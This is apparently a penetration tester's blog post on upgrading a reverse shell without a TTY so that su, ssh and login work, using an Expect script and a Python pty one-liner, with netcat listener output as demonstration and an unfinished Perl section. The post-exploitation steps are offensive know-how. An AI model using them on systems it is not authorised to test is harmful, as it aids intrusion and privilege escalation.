This is a follow-up to a topic I touched on breifly before when I talked about the problem of trying to use the SSH client when you don’t have a TTY.  I was recently in a position where I got an interactive shell on a box, discovered the root password but was unable to get root because I couldn’t run “login” or “su”.  Both of these required a TTY in order to work.

I don’t present a definitive solution in this problem (if you have one please sent it in!).  However I discuss a couple of approaches to getting a TTY…

Post-exploitation activities during a pentest may involve using “su” to try and log into other local accounts, or using “ssh” to log into other hosts.

Using “Expect” To Get A TTY

If you’re lucky enough to have the Expect language installed just a few lines of code will get you a good enough TTY to run useful tools such as “ssh”, “su” and “login”.

$ cat sh.exp
#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login
spawn sh
interact

The following output taken from a reverse shell demonstrates how “su” doesn’t work until we use the Expect script:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 48257
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ su -
Password:  mypassword
localhost ~ #

Likewise, the ssh client doesn’t seem to work properly (with or without the -T option):

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33250
sh: no job control in this shell
sh-3.2$ ssh localhost
Pseudo-terminal will not be allocated because stdin is not a terminal.
<big pause>

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 33252
sh: no job control in this shell
sh-3.2$ ssh -T localhost
<big pause>

After we run sh.exp we are able to use the ssh client as normal:

$ nc -v -n -l -p 1234
listening on [any] 1234 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 43498
sh: no job control in this shell
sh-3.2$ expect sh.exp
spawn sh
sh-3.2$ ssh localhost
ssh localhost
Password: mypassword
Last login: Wed Jan 16 13:43:20 2008 from 127.0.0.1

user@localhost ~ $

Using Python To Get A TTY

This is quite an elegant solution I found on Tero’s glob.  It should be effective against gentoo systems at least because the gentoo package management runs on python.

$ nc -v -n -l -p 1234
listening on [any] 1234 …
sh: no job control in this shell
sh-3.2$ su -
su: must be run from a terminal
sh-3.2$ python -c ‘import pty; pty.spawn(“/bin/sh”)’
sh-3.2$ su -
su -
Password:
localhost ~ #

Using PERL To Get A TTY

This is not such as great solution as IO::Pty isn’t installed by default on any system I’ve seen.  For completeness, though:

<hmmm… can’t get it will working.  Will post later.>